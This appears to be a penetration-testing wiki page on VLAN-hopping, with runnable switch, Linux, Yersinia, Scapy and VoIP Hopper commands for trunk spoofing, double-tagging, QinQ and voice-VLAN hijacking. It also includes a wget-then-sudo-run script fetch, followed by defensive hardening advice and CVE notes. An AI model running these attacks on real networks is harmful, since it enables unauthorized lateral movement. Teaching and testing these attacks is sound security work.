Lateral VLAN Segmentation Bypass

Reading time: 8 minutes

If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (for further details check https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the include mask.

If CDP is not operational, port identification can be attempted by searching for the MAC address:

SW1(config)# show mac address-table | include 0050.0000.0500

Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.

SW1# show vlan brief

Transitioning to trunk mode entails entering interface configuration mode:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.

Virtual interfaces are then created, assigned VLAN IDs, and activated:

# Legacy (vconfig) – still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

# Modern (ip-link – preferred)
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip link set eth0.10 up
sudo ip link set eth0.20 up
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20

Example for manually setting a static IP address on an interface (VLAN 10):

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
# or
sudo ip addr add 10.10.10.66/24 dev eth0.10

Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.

Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.

Other VLAN-Hopping Techniques (no privileged switch CLI)

The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a regular access port. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:

1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)

Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single DTP “desirable” or “trunk” frame converts the access port into an 802.1Q trunk that carries all allowed VLANs.

Yersinia and several PoCs automate the process:

# Become a trunk using Yersinia (GUI)
sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking

# Python PoC (dtp-spoof)
git clone https://github.com/fleetcaptain/dtp-spoof.git
sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable

Recon helper (passively fingerprint the port’s DTP state):

sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up

# or

wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
sudo python3 dtpscan.py -i eth0

Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.

2. Double-Tagging (Native-VLAN Abuse)

If the attacker sits on the native (untagged) VLAN, a crafted frame with two 802.1Q headers can hop to a second VLAN even when the port is locked in access mode. Tooling such as VLANPWN DoubleTagging.py (2022-2025 refresh) automates the injection:

python3 DoubleTagging.py \
        --interface eth0 \
        --nativevlan 1 \
        --targetvlan 20 \
        --victim 10.10.20.24 \
        --attacker 10.10.1.54

3. QinQ (802.1ad) Stacking

Many enterprise cores support Q-in-Q service-provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for ethertype 0x88a8 and attempt to pop the outer tag with Scapy:

from scapy.all import *
outer = 100      # Service tag
inner = 30       # Customer / target VLAN
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")

4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)

Corporate access ports often sit in an “access + voice” configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled.

VoIP Hopper (packaged in Kali 2025.2) supports CDP, DHCP options 176/242, and full LLDP-MED spoofing:

# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940

# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z

# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN

The technique bypasses data/voice separation and is extremely common on enterprise edge switches in 2025 because LLDP auto-policy is enabled by default on many models .

Defensive Recommendations

1. Disable DTP on all user-facing ports: switchport mode access + switchport nonegotiate.
2. Change the native VLAN on every trunk to an unused, black-hole VLAN and tag it: vlan dot1q tag native.
3. Prune unnecessary VLANs on trunks: switchport trunk allowed vlan 10,20.
4. Enforce port security, DHCP snooping, dynamic ARP inspection and 802.1X to limit rogue Layer-2 activity.
5. Disable LLDP-MED auto voice policies (or lock them to authenticated MAC OUIs) if IP-phone spoofing isn’t required.
6. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.

Real-World Vendor Vulnerabilities (2022-2024)

Even a perfectly hardened switch configuration can still be undermined by firmware bugs. Recent examples include:

• CVE-2022-20728† – Cisco Aironet/Catalyst Access Points allow injection from the native VLAN into non-native WLAN VLANs, bypassing wired/wireless segmentation .
• CVE-2024-20465 (Cisco IOS Industrial Ethernet) permits ACL bypass on SVIs after toggling Resilient Ethernet Protocol, leaking traffic between VRFs/VLANs. Patch 17.9.5 or later.

Always monitor the vendor advisories for VLAN-related bypass/ACL issues and keep infrastructure images current.

References

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
• VLANPWN attack toolkit – https://github.com/casterbytethrowback/VLANPWN
• Twingate "What is VLAN Hopping?" (Aug 2024) – https://www.twingate.com/blog/glossary/vlan%20hopping
• VoIP Hopper project – https://github.com/hmgh0st/voiphopper
• Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” – https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY